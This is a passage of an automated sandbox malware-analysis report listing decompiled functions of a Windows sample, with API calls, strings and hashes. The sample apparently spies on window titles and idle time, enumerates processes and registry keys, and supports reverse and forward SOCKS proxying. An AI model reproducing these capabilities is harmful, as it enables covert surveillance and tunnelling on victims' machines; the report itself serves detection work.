                                                • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00419278,00413670), ref: 004021C8
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004021D7
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004021E1
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 004021FA
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402203
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00402211
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00419DB4), ref: 00402222
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402242
                                                • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00419278,00413670), ref: 0040225A
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040226C
                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0000000F,6C995E04), ref: 00402282
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040228C
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402295
                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,?), ref: 004022A6
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004022B0
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004022B9
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004022CD
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 004022E3
                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004022ED
                                                • CreateThread.KERNEL32(00000000,00000000,a!@,00419D80,00000000,00000000), ref: 004022FE
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402309
                                                • CloseHandle.KERNEL32(00000000), ref: 00402312
                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,004127D0,6C995E04), ref: 00402327
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00402331
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040233A
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402343
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402355
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402363
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$V01@@$??4?$basic_string@V01@$??1?$basic_string@$?length@?$basic_string@?substr@?$basic_string@V12@$??0?$basic_string@??9std@@CreateD@2@@0@V?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@?size@?$basic_string@CloseD@1@@EventHandleObjectSingleThreadWait
                                                • String ID: a!@
                                                • API String ID: 3745950881-1276587126
                                                • Opcode ID: 856be9f4f3ce7ac650e4e88518b6d7f38fce8677c82795bf3c5a11abacb395d9
                                                • Instruction ID: 3de6d7aca83b72bfd5d2aa926936ec4f0bce37afc633d687db95027be15d9cc5
                                                • Opcode Fuzzy Hash: 856be9f4f3ce7ac650e4e88518b6d7f38fce8677c82795bf3c5a11abacb395d9
                                                • Instruction Fuzzy Hash: 4451EB7650010AEFCF04AFA4DD9DCEE7F78FF05346B008569F506A21A0DB74AA85CB98
                                                Function 00409891 Relevance: 51.0, APIs: 23, Strings: 6, Instructions: 225synchronizationCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004098A4
                                                • SetEvent.KERNEL32(?), ref: 004098AD
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 004098B6
                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6C995E04), ref: 004098CE
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00419288), ref: 004098DF
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004098EE
                                                  • Part of subcall function 00411550: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 0041155F
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411576
                                                  • Part of subcall function 00411550: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C), ref: 0041158C
                                                  • Part of subcall function 00411550: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 004115AA
                                                  • Part of subcall function 00411550: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115B4
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115BD
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115D2
                                                  • Part of subcall function 00411550: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115DF
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411631
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 0041163A
                                                  • Part of subcall function 00411550: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411643
                                                • inet_ntoa.WS2_32 ref: 00409945
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00409958
                                                • atoi.MSVCRT(00000000), ref: 0040995F
                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,fwdsocks), ref: 0040998A
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040999D
                                                • atoi.MSVCRT(00000000), ref: 004099A4
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000077), ref: 004099CA
                                                • CloseHandle.KERNEL32(00000000), ref: 004099D1
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 004099E8
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00409A8F
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,00419288,004135D4), ref: 00409ABF
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,00419288,004135D4), ref: 00409ACC
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,00419288,004135D8), ref: 00409B01
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,00419288,004135D8), ref: 00409B0E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000085,?,?,?,?,00419288,004135D8), ref: 00409B25
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00419288,004135D8), ref: 00409B36
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00419288,004135D8), ref: 00409B3F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@V01@@$?c_str@?$basic_string@D@2@@0@Hstd@@V?$basic_string@$?length@?$basic_string@V12@$?substr@?$basic_string@EventV10@V10@0@atoi$??4?$basic_string@?find@?$basic_string@CloseCreateD@1@@HandleObjectSingleV01@Waitinet_ntoa
                                                • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$fwdsocks
                                                • API String ID: 2730387600-1054587981
                                                • Opcode ID: b5e008b3dedb12d675bf83900b825b5c8bd3ef932ac85d2a881dc7822cde3202
                                                • Instruction ID: 0bd2c6c8d8ccaf5e7f6ce26a3cbf7b6bcedfd01191e7a593f2c8c0ae57ac7274
                                                • Opcode Fuzzy Hash: b5e008b3dedb12d675bf83900b825b5c8bd3ef932ac85d2a881dc7822cde3202
                                                • Instruction Fuzzy Hash: 36719171A00204ABCF04BBB5DC5A9EE7B7CFB41705B10853EF502A61E1EE799941CB9D
                                                Function 00404D2C Relevance: 49.2, APIs: 24, Strings: 4, Instructions: 150sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00404D6A
                                                • Sleep.KERNEL32(000001F4), ref: 00404D80
                                                • GetForegroundWindow.USER32 ref: 00404D82
                                                • GetWindowTextLengthA.USER32(00000000), ref: 00404D8B
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?), ref: 00404DA0
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00404DB1
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00404DBB
                                                • GetWindowTextA.USER32(00000000,00000000), ref: 00404DC3
                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,004198C8), ref: 00404DD2
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00404DE7
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00404DF0
                                                • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(-00000001), ref: 00404DFB
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[ ,?, ]), ref: 00404E1A
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?, ]), ref: 00404E24
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?, ]), ref: 00404E39
                                                • Sleep.KERNEL32(000003E8,?,?,?,?,?, ]), ref: 00404E7E
                                                • _itoa.MSVCRT ref: 00404E90
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?, minutes },?,?,?,?,?,?,?,?,?,?,?,?, ]), ref: 00404EB0
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,{ User has been idle for ,00000000,?,?,?,?,?,?,?,?,?,?,?,?, ]), ref: 00404EC0
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00404ECA
                                                  • Part of subcall function 00404857: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,00000000,?,00406CE6), ref: 0040486A
                                                  • Part of subcall function 00404857: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,00000000,?,00406CE6), ref: 0040487D
                                                  • Part of subcall function 00404857: SetEvent.KERNEL32(00000000,?,00406CE6), ref: 00404886
                                                  • Part of subcall function 00404857: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,?,00406CE6), ref: 00404895
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404EDC
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404EE5
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404EEE
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?, ]), ref: 00404EFC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$V?$basic_string@$D@2@@0@Hstd@@$??0?$basic_string@D@1@@V01@V01@@Window$?length@?$basic_string@SleepTextV10@V10@@Y?$basic_string@$??4?$basic_string@??8std@@?c_str@?$basic_string@?resize@?$basic_string@D@2@@0@0@EventForegroundLength_itoa
                                                • String ID: [ ${ User has been idle for $ ]$ minutes }
                                                • API String ID: 2152833798-3343415809
                                                • Opcode ID: 533441691e86934712fd24c7b2590e1f7961e04cf213b1c6e1bb565e8ede0f2f
                                                • Instruction ID: 525058fa33ed8dfd7edab486fe9c63d3967e1beeaa0c89e5b4ce229fbc2f24eb
                                                • Opcode Fuzzy Hash: 533441691e86934712fd24c7b2590e1f7961e04cf213b1c6e1bb565e8ede0f2f
                                                • Instruction Fuzzy Hash: 8D513071900109ABDB01BBA0DC49AEE7B78EF45716F04847AF601F21D1DB789A89CB9D
                                                Function 004093E2 Relevance: 48.2, APIs: 32, Instructions: 162processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004093F3
                                                  • Part of subcall function 00411650: GetCurrentProcess.KERNEL32(00408706,?,?,00408706,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411661
                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409407
                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00409428
                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00409435
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,00000000,0000022C,00000000,?,00000002,00000000), ref: 00409456
                                                  • Part of subcall function 0041167A: OpenProcess.KERNEL32(00000400,00000000,?,?,0040924B,?), ref: 00411690
                                                  • Part of subcall function 0041127D: _itoa.MSVCRT ref: 0041129B
                                                  • Part of subcall function 0041127D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,00000000,00419288,00000000,00419288,?,00419288,?), ref: 004112AF
                                                  • Part of subcall function 00411705: OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00411718
                                                  • Part of subcall function 00411705: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 00411750
                                                  • Part of subcall function 004113BA: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040BF0A,?,00419958,00419288,?,00419288,?), ref: 004113C5
                                                  • Part of subcall function 004113BA: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040BF0A,?,00419958,00419288,?,00419288,?), ref: 004113D1
                                                  • Part of subcall function 004113BA: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040BF0A,?,00419958,00419288,?,00419288,?), ref: 004113DB
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000,?,?,004146D0,00000000,004146D0,00000000,004146D0,00000000,00000002,00000000), ref: 004094D1
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,004146D0,00000000,004146D0,00000000,004146D0,00000000,00000002,00000000), ref: 004094E1
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,004146D0,00000000,004146D0,00000000,004146D0,00000000,00000002,00000000), ref: 004094EE
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,004146D0,00000000,004146D0,00000000,004146D0), ref: 004094FE
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004146D0,00000000), ref: 0040950B
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040951B
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00409528
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00409538
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00409544
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409550
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409559
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409565
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040956E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040957A
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409583
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040958F
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409598
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004095A1
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004095AD
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004095B9
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004095C5
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004095D1
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004095DA
                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 004095E8
                                                • CloseHandle.KERNEL32(00000000,00000000,0000022C,00000000,?,00000002,00000000), ref: 004095F7
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000002,00000000), ref: 00409604
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040960D
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@G@2@@std@@G@std@@$V10@V10@0@$D@1@@ProcessProcess32$G@1@@NextOpenV01@@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@CloseCreateCurrentFirstHandleSnapshotToolhelp32V01@_itoa
                                                • String ID:
                                                • API String ID: 819894693-0
                                                • Opcode ID: c1552d7fa9ccb7c8e72d5be230a8c76e7393b90730f99ca73fa8c2ead45fed27
                                                • Instruction ID: 0f7038aa123667529b47f5b5d6000185a29ddb58a02295160c2c54ac7022629c
                                                • Opcode Fuzzy Hash: c1552d7fa9ccb7c8e72d5be230a8c76e7393b90730f99ca73fa8c2ead45fed27
                                                • Instruction Fuzzy Hash: DB51EC7280011EABCF15EBA1DD49EEF777CEF15305F1041AAF506E2061EA389B49CB68
                                                Function 0040AE7D Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 191registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 0040AEEC
                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 0040AF1B
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041417C,?), ref: 0040AF31
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040AF43
                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040AF51
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF5A
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF63
                                                • RegEnumValueW.ADVAPI32(?,?,?,00003FFF,00000000,?,?,00002710), ref: 0040AFC4
                                                • _itoa.MSVCRT ref: 0040AFDB
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041417C,?), ref: 0040AFF3
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040B005
                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040B013
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B01C
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B028
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413760,?), ref: 0040B03D
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,?,00000000), ref: 0040B04C
